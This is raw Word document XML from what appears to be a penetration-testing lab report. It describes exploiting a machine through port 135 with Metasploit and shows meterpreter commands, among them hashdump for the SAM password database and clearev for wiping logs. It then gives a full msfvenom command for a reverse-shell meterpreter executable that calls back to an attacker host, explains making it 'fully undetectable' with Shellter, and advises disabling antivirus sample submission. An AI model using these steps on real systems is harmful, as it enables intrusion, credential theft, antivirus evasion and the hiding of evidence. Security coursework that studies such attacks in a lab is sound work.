        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="2562225"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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2862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left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_okz1g0lbzhsk" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 8: You can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"check" command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check whether the victim machine is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the exploit or not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="55245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2862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left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9359.999999999998"/>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line="276" w:lineRule="auto"/>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"exploit" command</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="1123950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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286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left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 due to the vulnerable port 135.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is indicated by change in prompt to "meterpreter &gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yebad3g56wj4" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 9; use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"help" command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="2114550"/>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2862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left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Below are the results of some of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"ipconfig" prints the remote machines all current TCP/IP network configuration values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"getuid" prints the server's username to he console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"hashdump" dumps the contents of the SAM database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"clearev" can be used to wipe off all the traces that you were ever on the machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ng9pssibknps" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Question - 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y6rgbquz0wx6" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creating a malicious .exe file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To create the executable, you would use msfvenom as shown in the command below:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">To obtain our IP address, we use the ifconfig command within Kali, specifying the interface as eth0 (since we are on Ethernet):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5245100" cy="12827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2451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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The screenshot below shows the output of the command on successful .exe generation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">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749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451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shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8zs4dvi68ii3" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Making the executable FUD (fully undetectable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To encode our executable, we’ll be using </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shellter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Shellter works by changing the executable’s signatures from the obviously malicious one to a completely new and unique one that can bypass detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also note that when writing your own, disable automatic submissions. Otherwise, whatever you write (if detected as potentially-unwanted software) will be uploaded by your antivirus for analysis … And we both know how that will end.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">On your Kali Linux, download Shellter with the command below:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt-get install shellter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">To launch Shellter, just type shellter on the terminal.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">You will be required to enter the absolute path to the executable to make FUD. Make sure to select “Auto” mode, as shown below.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5245100" cy="1727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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45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800" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
